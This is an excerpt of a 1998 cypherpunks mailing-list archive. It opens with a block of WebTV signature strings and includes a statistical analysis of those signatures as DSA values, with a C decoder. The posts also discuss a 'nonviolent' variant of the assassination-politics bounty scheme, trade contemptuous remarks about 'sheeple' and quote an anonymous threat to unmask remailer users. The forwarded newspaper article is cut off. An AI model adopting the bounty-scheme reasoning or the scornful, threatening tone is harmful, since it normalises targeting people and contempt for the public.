	ETAuAhUAu1Iqew/EOhYnZgOU58Om3kf156UCFQC5U5zcjdKslm+gHVDGA8kS7KDfrw== 
	ETAsAhRAluuTiGlkA0pTTQrS96lKy5KfVAIUVmDc/jmgcapS6OPi0f7GC2LWiGs= 
	ETAsAhRgrUK085k48XTyvJtjV744NtRaqAIUHaeGWxQlB7dN+JGhFRRd3uPD1oE= 
	ETAtAhUAxe+t90xYc5gu11r4UdkkWYXkf/kCFCKTOVpk24fBzCxgiNQUAQRusFjR 
	ETAsAhQFkHCJUN2ny0u0jl3WjNPHY6Yl4wIUBZgO5kN6SyaK60eaweEJ1nDni9M= 
	ETAuAhUArxDV2XhETP64MRb66lY7VfaYyvQCFQCkNcdozgK42u0tyjt+fetsOP+avA== 
	ETAtAhUAuO55Kyfu3IXcZwCnkHqFGusu4d8CFDsPeHIHe4ED8rJiKjBq5qH8VFp1 
	ETAtAhUApwDWE6SznfL7p2Zco9A7eKlBLK0CFCeK8SwXiFNER7Zolfx5HpzbGjw2 
	ETAtAhRYgPLAU3rD2az/0CEEVANNEfkmuAIVAI1P8B48KVsbPncKY02y7gbdMdVO 
	ETAtAhUAyufqHP9oNxtlQagp1qUye/d7i6QCFG6Xbb0G4d8tDBft51kMJ3qfNZIu 
	ETAsAhQ4f2BnEisdH77xF7pJ9UVuGnw7JAIUdC0riGFCHwKoHi4ym1mheydwJ0I= 
	ETAsAhQ/T2Q04OJktuo+aqes9FwQZzgwxAIUAKkop7G4t32hjgYA1BcOCvKTMuA= 
	ETAsAhQ2jhjme9uLGDc36ej8MfQl9SvWlAIUcalQyK62gAosuGGrlOfQYyPIdr4= 
	ETAsAhRLwsH2407Ux0Uegt4p1IhgnChZQgIUJUC7zML2TCdaa8KCsx1ALX78ks4= 
	ETAsAhRwytudBG/Surm3k9Rpim+seEJDlQIUCwaJtD00orhvcsBk5hejF9xiIYg= 
	ETAsAhQUFWce/o3nf9A0+5veXwxwn56IGAIUCXXk7jBXtOJ1GaIqmjj98EneBeo= 
	ETAtAhUAiY1TAn8GArAFblneodE/EgmcWvQCFBjSYY2mYMZh/xa/yRnXgR2F7WGP 
	ETAtAhQMQtetRNRDLWrlwcErj6N+NS34wQIVAKJeTuNEW2mCPhFh5YOyIQwKTf5/ 
	ETAtAhUAtOEBEZMiy6iZFWq/GnGZq/qFOzcCFEQhjzy9IEo8UH9OWU7GjE6NOSj/ 
	ETAtAhUAuwfq5YeNDQ0xOzBqRR+vsYX4zSACFEoSbZhAgtk8tvpSdj7Hzv9eZJmn 
	ETAtAhRkqDDRbj5tDMQuAS3cwf3Oxpmg5gIVAKyBIHC/C/GNKieyjDLh6tH6QtTX 
	ETAsAhRiOpds8g9YjeHEykvc0+Loy0tNrgIUFoHmjJIFUq1wH4xVJiwlXMBdjWk= 
	ETAtAhUAyUDUa3C9S6ZzFKMGOn2WBDh6lK0CFE4eZmzmlLUuqGl4FHdbvODRENP/ 
	ETAsAhR544QGSeW9yfs48377vFeVQCdrNgIUbyS7eYRxx/oDJ0E3cO7sCQUTvPA= 
	ETAtAhRks2NpyzI4iNt0vE0tQ9r/dikEqgIVALIpfRniAuyR06n6px3SA6SOtZt/ 
	ETAsAhR+7cmZvODtyYA4zDIgeQDqhVa+YgIUMn6rvpy6yQFQsAMlPvHFOyP4gao= 
	ETAsAhR2B816HOUv2s9PSKiTZPViMJzr/QIUXG+osG0WGQSZm0fo4BFpSsNCDQA= 
	ETAtAhQL5PAR2rjdW3qVYolgmDurRoh3VAIVALm48LP3zIoaHBEOSo/MJb0crRWB 
	ETAtAhUAidOF8N9+1iY3tLkfq50reYroqpUCFAfDePzP6GIP7c6Izo13UTQYCHM0 
	ETAsAhQisRfsfRl3EGtLVG5LNbG8wf2IswIUUp57I03H0Ez2oC11eKIljfkTIGo= 
	ETAtAhUAgrbX4Sp9EusPe2J1B2z7JmikDNsCFEspjdGnvUl/Vitii10G1eVoXB6e 
	ETAtAhUApN3QaE6l6qprseEHZfMz4SspQkMCFCgZpu5H3j5aKcUim20LigNvCjyY 
	ETAtAhUAxJVo9U2fQubRs6mS31c+7f5bXaUCFDSYvBVKiqiLLlcHEPIEYpcbC2Im 
	ETAsAhRaSZYfA3cD50Pju7/TzkYnHSO5CgIUPBP19U7AYAj85EF0ai4/OCvTYPY= 
	ETAuAhUAt+0aLCRpkHNUrKxIWOtn9aOl02ACFQC4LjTfS57CLGYkYDnABpCD3uOuRQ== 
	ETAuAhUAkS7apRM7gvXUavX8zd6eT7Ez0SkCFQDJ/XICHHsnRdIosVqDB74Lx9xO+g== 
	ETAtAhUAozF+eVTw0i7IlnTXyd2/YIO5KA0CFF+fgYhVtdBbxgvXk/xBEp2tvobj 
	ETAtAhUAv0/qsyrH/K8JY2kM/dppv42M6/QCFC3nY+yW1yNPZskObCYJoGFzgYS1 
	ETAuAhUAp0elGjSPHwUE7e7IG8/AR74KZhkCFQDAa4ciqxGSiGqYaLNWB0hCeHxmUA== 
	ETAtAhRT201UkHsC5hZrua4sUh+P67ZwJAIVAJ5HA1ij9Wq/4duTe4LZmLN3P+CA 
	ETAsAhRm+bDF9BlIUGR/esnGCDdS5fkrZwIUBWcSbgs5lUpP14Fq/jBg5u/OL40= 
	ETAtAhUAjTE4EGkWBFY7hsb1JfqKiKCt37cCFGCLogHm4H5E4lvP66j/UlGt0U9c 
	ETAtAhUAxcMpR6Do/xSDJXbL5kR9bR9aHDkCFCuggMSQDy/oPs4nprzzTWMc/QsA 
	ETAtAhRTABo+bi34UJ6znbNN/4Fi2tMcowIVAMSsW/q7QhK9TqOmuZC3vhAJWpxf 
	ETAsAhR/VDgD+TM1A6ouHlxki5zpyuaY7gIUO6J16uRcoeUdNZTOoEklIlOo/ok= 
	ETAsAhQrlir0l1KBcHlGk674SxIK3N6fbAIUL9SR9ZPri82+XJjszUhPOFykOIs= 
	ETAsAhR88ewYLtTcVWOvlLp3z9WR2IFT/wIUKUDqw7jvxRda771DxKuaSTRhVJ4= 
	ETAtAhQ2OX/bxQv7mdIzo+sKXAdqMp/fzAIVAJf0jSo30bbHD1xzDNhkWKJnAgfj 
	ETAtAhUAyGb0mD5nb4LX5A8TfY/yx0qKxzwCFEIVc6iOnL584BVmi6kjhnRZgMc7 
	ETAtAhUAjTT/HaZerq1IJYa0S+OS+Iz3i0sCFF7LPD7gVUyhKAwXKo7YF8WjXAEj 
	ETAtAhRBNcAlthsybKt7DrTS1QOYvS8WmgIVAIMNi9LGoegSV3GnzNPACj4XE2PS 
	ETAsAhQj/PJqa1W/6V/sLnn7AmTxcC6mCAIUR3rqIqSkWtc8bIbNYUaqWSb+8/4= 
	ETAtAhRcTURc5gYxQP2S0lqgvBsrh5OHswIVAKSgD1qYLGJYqY+TAZBQDlwce9w9 
	ETAsAhQHxwRcsYSxstkOA3gzA5ZVVbnccwIUHhZhss6SpbG71DKmpyBn93u+p3o= 
	ETAsAhQ8G1yOJ8lU2dKZXSXw/fRcJRb5cAIUe7dCsCqjh+qp6J2LCnFlQL3DyBQ= 
	ETArAhMsghtYsuzyv4uD/YAmZH3goC4yAhQLuvFNsV6YNA9z7KBxJUBx+k+FSA== 
	ETAtAhQj8cKqIbNReTWAr1C3h1XjDsJOZwIVAKAzk0LqS9eDzrhyXTWRuYoYVm+H 
	ETAtAhQneA4ropj063QYweX0WQ97JScgCwIVAJCmxy0k9TQ/TctjJjcuSXpaVvEK 
	ETAtAhQRyUpQGqs9NAAPLJocYTR8SdnwsgIVAL/USm8cjJiQmOZ6CXx7yUMMsfMi 
	ETAtAhRk+FBb05aueLxHhznjMwZJwsrTzQIVAIDoAIyUJQEVqOsj9a0wlEbOfWjS 
	ETAtAhUAzJ0u0GNzVpIlhEyLC9LnxVU3q3ECFFSRzTS1Sipo49PhmtnaS6TEJWRf 
	ETAsAhQxXOb0oux535qr7a42PfhWoRZMqQIUQrngUJuWsp1Jwu2/BvN8JYT19VQ= 
	ETAsAhQ/TupnlsxtiRNFhQ2Bz8LDFy7I7AIUJizsYf1QG+cDy5U2H4rlKP2y3sk= 
	ETAsAhR+GXnCzNpARJm9LpQ1Y10cwSJSHAIUR80chfgJdS5kQKIrs8FqbCyANjQ= 
	ETAtAhQjAoXRguhfN643BWmYDeCsFXF2cwIVAMYlkhiS7gotydPZl4j46W/eaewI 
	ETAtAhR3Vh6bn2H+DzY1j8Vwoer6AlMYsQIVAItMBCsenXRmcAgD/PbvqAezUH8V 
	ETAtAhUAtpQuAynfw90PoAdqt4YduLEQ7/cCFFD1puO0E9dMN2AZceQkn5Z18nU8 
	ETAsAhRvdX+/AP6MBbLRZvAk8bHApwMY5wIUV8hwPgRq5ryMwv3WZQZoH/csi3A= 
	ETAtAhRsGShYr2DDgLmm/dqbGJoieFSWwAIVAJwQ80EZIK2mrJN8Guhu2P7aa2WU 
	ETAsAhQw3TEYnYvAE4q+OQTvWq15b/3oCgIUQoOq554XKPFpPGe9Et1XP5UbqV8= 
	ETAtAhUAoGTgCmzuxMoHeLL9fWAfnkO1oJICFGLnFPwrhEJD8GpYpAcEDGJz3qBb 
	ETAuAhUAmbdIzpxDmYrCjkSLaz4JOEfFce8CFQCUMxH1NM9pUyZeA8isHScm7wi5YQ== 
	ETAtAhQBpbOyHl5R8qMSon8BOb3r9Y9G4wIVAJqOv4GcEg2NUXK7U6mIVK0PI9O4 
	ETAuAhUAnF1yQ6GsknvzotQ7umXwxvGCsa4CFQCPvSHw/9Bdawq7UkU13vq9le/2ig== 
	ETAtAhUAuo0yb8xF7Als4WV4eS35vKsGH7MCFH7+SCsjHUjdpnUVPpcTp8CQ2FgP 
	ETAtAhQWEhBLGpRT3LNUxxnItGCAt+1VEwIVAMbgS7lV1bxv/T8HL1Q9wHe67k4q 
	ETAuAhUAsWlh7SMkB5drtIqlAhSYc4XDcEsCFQDBSY01MO4d6hNklrDAXgMIV5mxYA== 
	ETAsAhQ8qwJVob3DjzbUpVtr3Rk19M32uAIUIUZzVlRniMJZmdhdakgip93GpN0= 
	ETAsAhRkupmQ11nFEMUM364jrlOcbKLdwQIUV3Qzl6ScqyObLYYwYSPR7vzb0N0= 
	ETAsAhQKizMSiQS8KR0WfqnDj6NaujRSKAIUeYTNAA8/GaD8oDmxjO+0gu4GmKU= 
	ETAtAhQFJaO+gA7LkWd69UOygzFmQYVIOAIVAMxNYOBBsy6F2BSKKjQPOubCpvAs 
	ETAtAhQAxf5v4oTlABauK1Da/H6Vaqyf+wIVAMtkSfsVbjt6D5V3qRY9qwmVQDYN 
	ETAtAhQIHmUV9lp8uoIzWAvOW6T2EV0WsAIVAMNkQPDPX0W1gIpgmztKq4euOHE3 
	ETAtAhUAh17mDFWnsX5bCt1ZhooT3620KNoCFFAD8/G5CX676c6ljHH5cwF3Ch7s 
	ETAtAhQ35ZEDofu/NKdMpDcXB4t04/kG2QIVAMCDU3a/whaMaytfP8faLTOxp5EL 
	ETAsAhRlkdIw7E1TwPEzqABVK93FUgDr8AIUfDUA1VCib8jq9XDQSjk3CHMvQ8o= 
	ETAuAhUAqivgFW2VzvD5Rvq6Vu8Jsg0KTp0CFQCLX+rupaHAQHfD0PM3+vkx9AW3UA== 
	ETAsAhQD/R9Yc6Bwh/TQ99fy0GPdloC4qwIUbuU/f2hryvZunscXLWSSHstdOHc= 
	ETAuAhUAzBp6OsUQehf9fQlXIjoYmsm2krcCFQDE+cXZAyR8EuL8NkY8DQqbApN78w== 
	ETAsAhQ7xJlBLWIb++eonXpSICRVC8bLXwIUaNFoXK1Pv2KqYN8eIP6WgBbC+AA= 
	ETAsAhQlrGf/q7w3fzLRGonJlVpH+x4Z5QIUMmSNbuXQFl4a4jczM3mNdiVKhEE= 
	ETAtAhUAmeAhOHBuuu3ACrpk13DJddd7QbkCFF1lwYafbL3sXTl8F1de7eTcZ3vW 
	ETAtAhUAv7wiLG+CxSWpeMfpGKZdN+xrMg0CFGSrMkXUR13BoH7sleHsmlPDF1dU 
	ETAsAhRfNxf1Yl4qu6/OqLNrvOpYQhMsjgIUWHLxWCyn2vV0XTWIyl2Fs85vI/0= 
	ETAtAhRa1+tx331emTD1dlqLyHgMqABSCgIVAImI2WR0FAJzIlQGkw/qQx0jDO3O 
	ETAuAhUAvsVhQZwPNfy1sKK0c49Zdk5wNesCFQC/Vh2kwRD2rBi38B7qQaBbRuYd4g== 
	ETAtAhUAySYuDikBrjerHWILoPXjsz1bXrACFE0Q/SNRHiCBliSLaJLafuNCTw/w 
	ETAsAhQTZgDqZKq3lG14t+G3ko+i7WQSqAIUeB6kQCKI1l6UyjZWpglXmNJl+Rw= 
	ETAtAhRxleSLnN3clAwwjwt8+pxsdsiGIQIVAKrtyqi5rCpwRzLaZwnALmWwURQK 
	ETAsAhQjdOiORb5HQ9iCF8V005WTa3bm2wIUXgyyU8MGaIKay+wiHk3oHTzJqqc= 
        ETAsAhQDqtur/jfleJ2CDOnNrVoeyALEQAIUOQyCBbzjx5HHfxeMERDgCjztXOU= 
        ETAtAhUAmCCzQt+Tqt6fNX+L9+gDCECaqQkCFA0YCPz5tk85mUgq7iX/u4vWvOgG 
	ETAtAhQlLfNwCiPNVbRBWMc1Xi+NAo2WPAIVALUmzBTljE8uy2/HcsZro91UYTKU 
	ETAuAhUAkwIYI27hvEwY1FEOAJmsVtMaI7QCFQC8HHJVkciqW/DFxB03dv5VU1AArQ== 
	ETAtAhUAtV/uPVMmHc9IR4qhdFa2k4BlPPsCFBz+UkolpxbLQYZHDx21oQDFnhTq 
	ETAtAhUArPlUBqj3JFDHfQ6ZDmEa0K+2zzsCFD9n19QcfN86JviH8mr6/SZjyJly 
	ETAsAhQdDSPIBO0kTAzcg520LzWvA3Zt2QIUbyvC6o8/PZBgnoznni6E0LCQdfA= 
	ETAtAhQk6unumYsg51lkLB6KYORnmRKT/wIVALnjPa0p9HnbLCYs0u7ljqlt4B9P 
	ETAuAhUAkzZgOK9FI2E5up9lKjG7AU7xPvMCFQCnbFRKWCQfk23+HfV0EP3z9l3CSw== 
	ETAtAhUAjhXEFrCKfcHa5dmb2MoEIf1dFVACFGWiVHbd3+ZFKLE+I1k+GmQp6CVr 
	ETAsAhQlqOTBN7pR5gYdPpmnSb2ZeBv/OQIUM+aQwGrkLnwX8oACguV67K38aX4= 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 12 Oct 1998 13:14:21 +0800
To: cypherpunks@cyberpass.net
Subject: nonviolent AP variant
Message-ID: <Pine.BSF.4.02.9810112149330.13501-100000@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain




At yesterday's physical cypherpunks meeting in Palo Alto, Steve Schear and
I were talking about the practical/legal/moral aspects of the
"assassination politics" scheme; during the course of that conversation,
we discussed the possibility that a similar scheme might usefully be
employed in a non-violent context, assuming the existence of a working
(=legitimate) legal or political system.

In a nutshell (this is my later gloss on things we discussed, so confusion
should be blamed on me), the system might be organized as follows:

One or more organizers announce their intention to create a prize pool
concerning a certain question - for example, "The circumstances under
which Bill Clinton's presidency ends." The organizers would then collect
contributions towards a prize pool to be awarded to the person with the
most accurate guess, as well as guesses about the subject matter of the
general question. Depending on the gambling/contest laws of the local
jurisdiction, the organizers might or might not choose to require a
contribution towards the pool in order to register a guess/prediction.

Further, the organizers would likely choose to reject any guesses which
required or implied the breaking of laws (or the wrongful initiation of
force), as they'd prefer not to be investigated/prosecuted in the event
that a guesser did something illegal/wrong in hopes of collecting the
prize.

The contest would then proceed - guesses would likely be held
confidentially, time-stamped, to minimize piling on (especially where
entry is free). Third parties with information or the ability to
legitimately modify the outcome of the contest - for example, former
mistresses or business partners who might come forward with otherwise
withheld evidence of wrongdoing - would have a strong motivation to
provide as detailed a guess as possible, including their particular
information, and then to make that information available to the
legal/political system so that it would be acted upon.

If the prize pool grew large enough, the subject of the question might
choose to force the resolution, winning the prize for themselves - e.g.,
if $10M is enough to tempt Clinton from office, he can predict his own
resignation (e.g., "Clinton will resign on Oct 31, 1998, wearing a blue
suit and a yellow striped tie; the last sentence of his speech will be
'Darlin', let's git the truck packed, I'm outta here!'")  

This modification of the "AP" process has several advantages - it's
probably legal, it's nonviolent, and it's likely to encourage (rather than
undermine) cooperative/consensual governance, instead of rule by
fear/force. It seems to be the result of a combination of the "idea
futures" system and the reward process for Eric Rudolph as interpreted by
Bo Gritz - e.g., get the figure high enough, and the target will turn
himself in and use the reward to fund his own defense. 

It definitely needs a better name than "assassination politics". 

--
Greg Broiles
gbroiles@netbox.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 12 Oct 1998 04:47:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Hidden WebTV signatures
Message-ID: <199810112027.WAA06963@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Gutmann writes:

> For those of you who don't read sci.crypt, Robert Ames <gnome@istar.ca> has 
> posted an article in which he observes that all WebTV posts contain an 
> X-WebTV-Signature: line containing base64-encoded data.  For samples of 
> WebTV-generated posts, try the alt.weemba newsgroup, which is filled with 
> WebTV-user drool (caution: remember to employ protection when exposting your 
> mind to the content of the messages).  Some samples:
>  
> X-WebTV-Signature: 1
>         ETAsAhQDqtur/jfleJ2CDOnNrVoeyALEQAIUOQyCBbzjx5HHfxeMERDgCjztXOU= 
> X-WebTV-Signature: 1
>         ETAtAhUAmCCzQt+Tqt6fNX+L9+gDCECaqQkCFA0YCPz5tk85mUgq7iX/u4vWvOgG 

Could someone grep their news spool for a few hundred of these signatures
and post them here?  We can do statistical analysis on them and determine
whether they all appear to be modulo the same q value.

> These decode into ASN.1-encoded DSA signatures, eg:
>  
>    1 30   45: SEQUENCE {
>    3 02   21:   INTEGER
>             :     00 98 20 B3 42 DF 93 AA DE 9F 35 7F 8B F7 E8 03
>             :     08 40 9A A9 09
>   26 02   20:   INTEGER
>             :     0D 18 08 FC F9 B6 4F 39 99 48 2A EE 25 FF BB 8B
>             :     D6 BC E8 06
>             :   }
>  
> for the second one.  The key isn't included in the header, presumably the 
> @webtv.net address can be tied to the hardware which contains some hardcoded 
> DSA key.  I wonder if WebTV users know they're signing each message they send?

If they are DSA signatures, they should all be mod q, where q is some 160
bit prime.  Whether everyone uses the same key or different keys, they
probably all share p and q.  In that case the histogram of the values should
be flat up to a cutoff point.  We need to collect some hundreds of these
values in order to distinguish them from random 160 bit values.

The largest q value found in a dozen or so alt.weemba messages from
dejanews started with 0xc0, so q must be at least this large if they
are DSA sigs.  This amount of data was not sufficient to distinguish
from alternate theories, such as that each person has a random 160 bit q.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 12 Oct 1998 14:52:56 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: nonviolent AP variant
In-Reply-To: <Pine.BSF.4.02.9810112149330.13501-100000@ideath.parrhesia.com>
Message-ID: <199810120632.XAA25308@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



if you guys spent any fraction of the amount of time
thinking about "assassination politics" as a way to
improve government, as you did about the legitimate
ways that are already available, I think the world
would soon be turned into a better place.

there are obvious ways of improving the government
that are not being tried. but far easier to take
the nihilistic "cryptoanarchy" pseudo-ideology
of insisting that government is inherently
evil, and any thoughts about improving it are
inherently sinful and misguided, i.e. blasphemous.

the truth is that sheeple are immature and lazy, 
incapable of planning their destiny past the next
6 pack, and therefore fully deserving of their stormy fate
at the hands of a small elite who takes organization
seriously-- with only the small unfortunately twist
that they are all self-serving parasites.

perhaps an economic crash is a natural intermittent human event
that says to the public, "wake up"!! a crisis is always
a sign of a kind of false image crumbling under 
truth/reality which will ultimately puncture all
lies (but will not deliver slaves from self-imposed
slavery, if that is their conscious or unconscious choice).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 12 Oct 1998 17:02:05 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: nonviolent AP variant
In-Reply-To: <199810120632.XAA25308@netcom13.netcom.com>
Message-ID: <000701bdf5bb$5b5309a0$2b8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vladimir Z. Nurd:

: if you guys spent any fraction of the amount of time
: thinking about "assassination politics" as a way to
: improve government, as you did about the legitimate
: ways that are already available, I think the world
: would soon be turned into a better place.


So what are you going to do about it if they don't, Neuro -  get on the list and
whine?


: the truth is that sheeple are immature and lazy,
: incapable of planning their destiny past the next
: 6 pack, and therefore fully deserving of their stormy fate
: at the hands of a small elite who takes organization
: seriously-- with only the small unfortunately twist
: that they are all self-serving parasites.


The sheeple deserve it, but the rest of us don't.
Consider abandoning them to their fate.


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 12 Oct 1998 08:26:23 +0800
To: cypherpunks@einstein.ssz.com
Subject: Anon poster claims anon remailers broken
Message-ID: <199810120007.CAA25757@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>PS. there is someone on this list who knows who
>i am. yes there is someone who knows who anon
>posters are. we fucking hate you and am waiting
>for you to take the trap and we will reveal your
>identity scumbag.

I don't post here much and in fact I haven't in at least a month
or two, but I'm willing to take this challenge.

Since you know who anon posters are, who am I?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 12 Oct 1998 12:59:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Hidden WebTV signatures
Message-ID: <199810120441.GAA12553@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Phelix writes:
> Here ya go.  313 webtv sigs

Thanks.  Each of these decodes to a pair of integer values, as described
by Peter Gutmann.  Here is a histogram of the high order hex digit:

# Values    Digit
   54         0
   35         1
   56         2
   49         3
   43         4
   50         5
   47         6
   57         7
   45         8
   43         9
   49         a
   54         b
   44         c
    0         d
    0         e
    0         f
   
It cuts off at "c" and is pretty uniform up to then so it does indicate
that the values are uniformly distributed modulo a common 64 bit value.
The last few values, numerically, are:

cac1cb18c3d20ca400db3a1458128bea3f696edf
cae7ea1cff68371b6541a829d6a5327bf77b8ba4
cb6449fb156e3b7a0f9577a9163dab099540360d
cb9e0b23cdfebac34c38a933fcf303a5ecac64eb
cba8abfa8cdcfa7a7f91e3563b3d7fa24511ab6c
cc1a7a3ac5107a17fd7d0957223a189ac9b692b7
cc4d60e041b32e85d8148a2a340f3ae6c2a6f02c
cc9d2ed06373569225844c8b0bd2e7c55537ab71
cd53fb5bc7699730b39d42b99782fecfdfe52a5a

This suggests that the "q" value is probably a 160 bit value starting
with 0xcd.

We can't tell whether there is a common key or whether every unit has a
different key.  In either case it is likely that p, q and g will be shared
among all units.  The individual part is the secret x value and the
public y = g^x mod p.  Probably there is no way to find these from
the signatures.

For reference, here is the 20 minute program which produced this output:


/* Decode webtv signatures */
#include <stdio.h>
#include <ctype.h>

#define TAG_INTEGER     2
#define TAG_SEQUENCE    16


static
unsigned char asctobin[] =
{
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0200, 0200, 0076, 0200, 0200, 0200, 0077,
    0064, 0065, 0066, 0067, 0070, 0071, 0072, 0073,
    0074, 0075, 0200, 0200, 0200, 0200, 0200, 0200,
    0200, 0000, 0001, 0002, 0003, 0004, 0005, 0006,
    0007, 0010, 0011, 0012, 0013, 0014, 0015, 0016,
    0017, 0020, 0021, 0022, 0023, 0024, 0025, 0026,
    0027, 0030, 0031, 0200, 0200, 0200, 0200, 0200,
    0200, 0032, 0033, 0034, 0035, 0036, 0037, 0040,
    0041, 0042, 0043, 0044, 0045, 0046, 0047, 0050,
    0051, 0052, 0053, 0054, 0055, 0056, 0057, 0060,
    0061, 0062, 0063, 0200, 0200, 0200, 0200, 0200
};



/* Do base64 decoding */
/* Return number of chars output */
static int
decode64 (const unsigned char *inbuf, unsigned char *outbuf)
{
    int w = 0;
    int cnt = 0;
    int ci, co;
    unsigned char *op = outbuf;

    for ( ; ; ) {
        ci = (*inbuf++);
        if (ci & 0x80)
            break;
        co = asctobin[ci];
        if (co & 0x80)
            break;
        w = (w << 6) | co;
        if (++cnt == 4) {
            *op++ = (w >> 16) & 0xff;
            *op++ = (w >>  8) & 0xff;
            *op++ = (w >>  0) & 0xff;
            cnt = 0;
            w = 0;
        }
    }
    if (cnt == 1) {
        fprintf (stderr, "Bad base64 input\n");
        exit (1);
    } else if (cnt == 2) {
        *op++ = (w >>  4) & 0xff;
    } else if (cnt == 3) {
        *op++ = (w >> 10) & 0xff;
        *op++ = (w >>  2) & 0xff;
    }
    return op - outbuf;
}

/* Print out a nominally 20 byte value */
static void
hexdump20 (unsigned char *data, size_t datalen)
{
    if (datalen > 20) {
        int cnt = datalen - 20;
        while (cnt--) {
            if (*data++ != 0) {
                fprintf (stderr, "Error, more than 20 byte output\n");
                return;
            }
        }
        datalen = 20;
    }
    if (datalen < 20) {
        int cnt = 20 - datalen;
        while (cnt--)
            printf ("00");
    }
    while (datalen--) {
        printf ("%02x", *data++);
    }
    putchar ('\n');
}


/* Read start of an X.509 object */
static int
decodetag(unsigned char **buf, int *length)
{
    unsigned char tag = *(*buf)++ & 0x1f;
    int len = *(*buf)++;
    if (len & 0x80) {
        int lenlen = len & 0x7f;
        len = 0;
        while (lenlen--) {
            len <<= 8;
            len |= *(*buf)++;
        }
    }
    *length = len;
    return tag;
}


main ()
{
    unsigned char buf[1024];
    unsigned char *bp;
    unsigned char outbuf[1024];
    unsigned char *op;
    int outlen;
    int len;
    int tag;

    while (fgets(buf, sizeof(buf), stdin)) {
        bp = buf;
        while (isspace(*bp))
            ++bp;

        outlen = decode64 (bp, outbuf);

        if (outbuf[0] != 0x11) {
            fprintf (stderr,
                "First char of output not 0x11, unexpected!\n");
        }
        op = outbuf + 1;
        tag = decodetag (&op, &len);
        if (tag != TAG_SEQUENCE) {
            fprintf (stderr, "Output is not a SEQUENCE, skipping\n");
            continue;
        }
        tag = decodetag (&op, &len);
        if (tag != TAG_INTEGER) {
            fprintf (stderr, "First value is not an INTEGER, skipping\n");
            continue;
        }
        hexdump20 (op, len);
        op += len;
        tag = decodetag (&op, &len);
        if (tag != TAG_INTEGER) {
            fprintf (stderr, "Second value is not an INTEGER, skipping\n");
            continue;
        }
        hexdump20 (op, len);
    }
    exit (0);
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 12 Oct 1998 14:11:42 +0800
To: mail2news@basement.replay.com
Subject: No Subject
Message-ID: <199810120542.HAA16084@replay.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 12 Oct 1998 21:22:22 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Court ruling allows anonymous political attacks
Message-ID: <v04011700b2479d6f116b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 12 Oct 1998 04:14:44 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Court ruling allows anonymous political attacks
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  The Oregonian
http://www.oregonlive.com/todaysnews/9810/st101108.html

Court ruling allows anonymous attacks

 Viciousness increases after the U.S. Supreme Court
 strikes down an Oregon law requiring that political
 ads be credited

 Sunday, October 11 1998

 By Laura Oppenheimer of The Oregonian staff

 Terry Thompson and Ryan Deckert opened their
 mailboxes in mid-September to discover unpleasant
 surprises: anonymous political advertisements
 lambasting their public records.

 The two Democratic Oregon House members
 apparently were the first targets in what promises to
 be a vicious advertising attack season. And there's still
 plenty of time for candidates to exchange barbs
 before the Nov. 3 election, said Tim Gleason, dean of
 the University of Oregon School of Journalism and
 Communication.

 "This is the true test, said Gleason, who is coordinator
 of the Oregon Alliance for Better Campaigns. Races
 tighten up, and people are going all out. Frequently,
 the candidate isn't really in control of all the steps
 taken toward the end. A lot of people want that
 candidate to win.

 Although the ads against Thompson and Deckert
 included their opponents return addresses, as
 mandated by the U.S. Postal Service, they did not say
 who paid for or authorized them. Some candidates
 are taking advantage of a 1996 U.S. Supreme Court
 ruling that invalidated Oregons law requiring the
 sponsors name to run with all political advertising.

 Bills proposed during the 1997 Legislature would
 have reinstated regulations to counteract the court
 ruling. But the legislation stalled at the committee level
 and never came up for a vote.

 Oregons public officials didnt just maintain the level of
 negative attack ads by ignoring the legislation,
 Secretary of State Phil Keisling said. They raised the
 profile of the ruling so candidates knew they could run
 anonymous advertisements.

 "The Legislature just turned their backs on it, Keisling
 said. Their inaction spoke volumes about their
 concern about anonymous ads. The effect was to put
 up a big neon sign saying, Anonymous attack ads now
 allowed in Oregon.

 So whats the big deal about one little line of type that
 says paid for by . . . ? In a political climate where
 sparring can lead to voters cynicism, candidates
 should take responsibility for their criticisms, Keisling
 said. And all-out advertising slugfests can result in
 hard feelings -- and more partisan politics -- after the
 election is over, legislators said.

 "The truth matters, said Ed Kammer, an advertising
 activist who lobbied legislators to pass new
 regulations. The facts matter. Its a persons right to
 ignore what they want to ignore, but its not a thiefs
 right to disguise the theft.

 Many legislators, including Thompson, D-Newport,
 and Deckert, D-Beaverton, said they would support
